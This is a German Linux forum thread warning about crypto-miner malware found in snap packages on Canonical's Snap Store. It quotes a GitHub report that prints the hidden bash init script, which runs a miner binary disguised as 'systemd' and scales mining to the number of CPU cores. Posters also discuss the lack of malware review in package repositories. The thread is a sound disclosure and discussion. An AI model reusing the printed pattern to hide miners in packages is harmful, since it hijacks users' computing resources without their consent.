Willkommen Gast. Bitte einloggen oder registrieren. Haben Sie Ihre Aktivierungs E-Mail übersehen?
15.12.2018, 10:46:47

.
Einloggen mit Benutzername, Passwort und Sitzungslänge

Mitglieder
  • Mitglieder insgesamt: 21193
  • Letzte: Evanur
Statistiken
  • Beiträge insgesamt: 561062
  • Themen insgesamt: 45479
  • Heute online: 463
  • Am meisten online: 992
  • (17.11.2018, 20:17:55)
Benutzer Online

Autor Thema:  Vorsicht mit "Snaps". Malware ist in Canonical's snap store gelandet.  (Gelesen 1466 mal)

0 Mitglieder und 1 Gast betrachten dieses Thema.

Beim Verwenden von "Snaps" ist erhöhte Vorsicht geboten. Ein User hat mehrere mit Crypto Minern versehene Pakete hochgeladen.
Nach einer Beschwerde von einem findigen User wurden diese Mittlerweile entfernt. Zeigt aber dass das Potential und der Wille dazu prinzipiell da ist.
Hier noch die Anfrage auf Github:
https://github.com/canonical-websites/snapcraft.io/issues/651

Zitat
This application contains hidden сrypto-currency miner inside.

squashfs-root/systemd - miner
squashfs-root/start - init script:
#!/bin/bash

currency=bcn
name=2048buntu


{ # try
/snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1 -g
} || { # catch
cores=($(grep -c ^processor /proc/cpuinfo))

if (( $cores < 4 )); then
    /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1
else
    /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 2
fi
}
I did not find way to complain about the application. Which way is good for it?

Scheinbar lässt auch die Möglichkeit solche Fälle schnell und direkt zu melden zu wünschen übrig. Ein Issue auf Github (das natürlich auch einen github Account vorraussetzt) sollte man dafür eigentlich nicht starten müssen. Die Reaktion hat auch volle 24 Stunden gedauert.
Crypto Miner sind jetzt nicht so wild aber es hätte ja genauso gut etwas anderes sein können.

lennartware


Interessante Passagen aus dem Heise Artikel:
Zitat
Keine Prüfung auf Schadsoftware im Store
Der Snap Store von Ubuntu testet zwar die technische Lauffähigkeit einer Anwendung, verfügt aber über keine Prüfung auf versteckte Schadsoftware. Jeder kann Snap-Pakete in den Snap Store hochladen.
[ … ]
Ubuntu führte sein Paketformat Snap mit Version 16.04 seiner Linux-Distribution ein und versprach dadurch mehr Komfort durch Wegfall der Abhängigkeiten sowie mehr Sicherheit, weil eine Snap-Anwendung eigentlich abgeschottet in einer Sandbox läuft – was jedoch für Desktop-Snaps nicht ohne weiteres gilt.

Amüsant:
Zitat
Angeblicher Autor verteidigt sich
… Er habe mit dem Mining lediglich seine Software "finanzieren" wollen und bietet an, den Betrag der Ubuntu-Foundation zu spenden. Inwiefern er wie behauptet tatsächlich der Malware-Autor ist, lässt sich nicht bestätigen.

Aus den Kommentaren dazu:
Zitat
Ob NPM oder "Snap" oder JavaScript oder "apps" aller Art - man kann die banale Erkenntnis immer wieder so zusammenfassen:
"Irgendwelche executables von Fremden aus dem Netz ausführen ist gefährlich"
Und das jede öffentliche Plattform, auf der solche executables angeboten werden können, auch von Leuten mit niederen finanziellen Interessen missbraucht werden, ist einfach nur selbstverständlich.
Ein "Kryptominer" gehört da noch zu den kleinsten denkbaren Schadensszenarien.
Schön, wenn der Fall jetzt wenigstens mal eine Diskussion angestoßen hat, die eigentlich vor Öffnung des Angebots hätte geführt werden müssen.
(Autor: pn)
« Letzte Änderung: 14.05.2018, 17:44:38 von aexe »

Gibt es eigentlich bei Launchpad (PPAs) eine Prüfung auf versteckte Schadsoftware?


Mir gefällt das Konzept "snap" aus vielen Gründen garnicht und natürlich ist es hier besonders leicht Leuten etwas unterzujubeln weil quasi gar kein Hinderniss da ist.
Trotzdem wird bei solchen Artikeln und Kommentaren immer und immer wieder etwas implizit angedeutet was einfach nicht stimmt - nämlich dass in den offiziellen Repos einer Linux Distribution etwas stattfindet das den Namen "Prüfung auf Schadware" verdient hätte.
Das stimmt so aber halt auch nicht und das ist auch so gut wie unmöglich. Ein Maintainer kümmert sich darum dass der Code vom legitimen Upstream Anbieter/Entwickler kommt aber einen professionellen Software Audit für jedes Paket führen die natürlich auch nicht durch, und das wäre auch unmöglich. Schadcode ist immer potentiell nur einen unvorsichtigen Pull Request (etwas übersehen) zu viel vom User entfernt.
Und da darf man sich jetzt nicht vorstellen dass das vergleichbar wäre mit Schadcode in Firefox oder Gnome zu bringen. Linux Distris bieten zwischen 10 und 50 tausend Pakete an, kommen von zehntausenden verschiedenen Code Repos. Paketverwalter sind nicht zwangsläufig Programmierer und schon garnicht Sicherheitsanalysten.

lennartware